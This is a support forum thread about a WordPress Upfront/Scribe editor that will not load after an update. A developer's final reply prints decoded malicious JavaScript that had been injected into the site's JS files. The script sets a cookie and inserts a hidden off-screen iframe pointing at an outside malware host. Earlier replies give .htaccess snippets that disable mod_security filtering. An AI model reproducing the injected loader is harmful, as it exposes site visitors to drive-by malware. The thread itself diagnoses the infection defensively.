Scribe/Up Front editor will not load

Since the update, I can't edit in UpFront/Scribe. The "UpFront" button is grayed out and does nothing when I try and edit the site. I have tried both versions of the .htaccess code found in other's topics with no luck.

Thanks in advance for the help.

Cheers

  • Nastia
    • Support Rock Star

    Hello Burleson, I hope you are doing well today!

    I'm sorry to hear you have this issue.

    Just want to make sure if you have tried to add this specific code to .htacces file:

    <IfModule mod_security.c>
    SecFilterRemove 00318
    </IfModule>

    If you did, and the Upfront still not working, the next step would be to check for a conflict. Would you please run a quick check for a conflict with a plugin?

    Deactivate all plugins and try to open Upfront again. If the issue is gone, please activate one plugin at the time to find out which one is causing this conflict.

    Please follow the flowchart from our manual:
    https://premium.wpmudev.org/manuals/using-wpmu-dev/getting-support/

    Let us know how it went!

    Cheers,
    Nastia

  • Burleson
    • Flash Drive

    Hey Nastia,

    I did try that code and this one

    # Disable mod_security
    <IfModule mod_security.c>
      SecRuleEngine Off
      SecFilterInheritance Off
      SecFilterEngine Off
      SecFilterScanPOST Off
      SecRuleRemoveById 300015 3000016 3000017
    </IfModule>

    neither worked.

    I'll disable plugins and go from there, tho I had no conflicts or issues before the update.

  • Nastia
    • Support Rock Star

    Hello Burleson, I hope you are well today!

    Thank you for posting here the errors from JS console. Would you please send your credentials to us so we can have a look?

    You can send credentials by using our secure contact form https://premium.wpmudev.org/contact/

    - Mark to my attention, the subject line should contain only: ATTN: Nastia
    -WordPress admin username
    -WordPress admin password
    -login url
    -FTP credentials (host/username/password)
    -link back to this thread for reference
    -any other relevant urls

    Select “I have a different question” for your topic.

    We are waiting for your email!

    Kind Regards,
    Nastia

  • Nastia
    • Support Rock Star

    Hello Burleson, I hope you are doing well today!

    Thank you for sending your credentials!

    Our developer found a very strange JS output that is not coming from Upront, you will find it in the attached txt file. This code is interfering with Upfront and it's the main reason why it's not loading. It seems like either some malicious code either some caching code. It looks more as caching code since there are references to expires and Date.

    Most likley it's related to server cache. What is your hosting provider?
    Or have you used any file minify technique to minimize/cache JS?

    Would you please try to reinstall Upfront and Scribe theme?
    - Deactivate the themes and delete them.
    - Use WPMU DEV Dashboard to reinstall the themes

    If this will not fix this issue, would you please upgrade to the previous version and test if the Upfront will load again?

    Please advise,

    Kind Regards,
    Nastia

  • Ivan
    • Developer

    Hello Burleson,

    While re-running decoding on that strange JavaScript output this turned out as a result:
    window.onload = function(){function x22bq(a,b,c){if(c){var d = new Date();d.setDate(d.getDate()+c);}if(a && b) document.cookie = a+'='+b+(c ? '; expires='+d.toUTCString() : '');else return false;}function x33bq(a){var b = new RegExp(a+'=([^;]){1,}');var c = b.exec(document.cookie);if(c) c = c[0].split('=');else return false;return c[1] ? c[1] : false;}var x33dq = x33bq("0f8fec5f9faf596db936516bb6928cdf");if( x33dq != "7ac4bb7466382317b7021d0a8a540427"){x22bq("0f8fec5f9faf596db936516bb6928cdf","7ac4bb7466382317b7021d0a8a540427",1);var x22dq = document.createElement("div");var x22qq = "http://stat.gdegetumoyadyra.info/megaadvertize/?BZJbursaZ=eYxsGNjdA&vOeYzqQkkmngP=HvDusSTdWU&IqzFAPSQXFK=IhxgMIyLEP&BoRcaxs=IuTSWqcsiE&siAFUkpsOIai=akDlipJPgDu&OFLLWfacNr=LkUJFIjUYJQ&keyword=1cca14dd40aa2f42fae85f80dfaedbc9";x22dq.innerHTML="<div style='position:absolute;z-index:1000;top:-1000px;left:-9999px;'><iframe src='"+x22qq+"'></iframe></div>";document.body.appendChild(x22dq);}}

    So, unfortunately it is some advertising code injected into every JavaScript file (not just the ones that come from Upfront). When opening URL referenced in code with Google Chrome it will show "The site ahead contains malware" warning before opening the page.
    The best way to resolve this would be to contact your hosting provider to inspect how this code ended up in JavaScript files. Hopefully your hosting provider will be able to resolve this for you.

Thank NAME, for their help.

Let NAME know exactly why they deserved these points.

Gift a custom amount of points.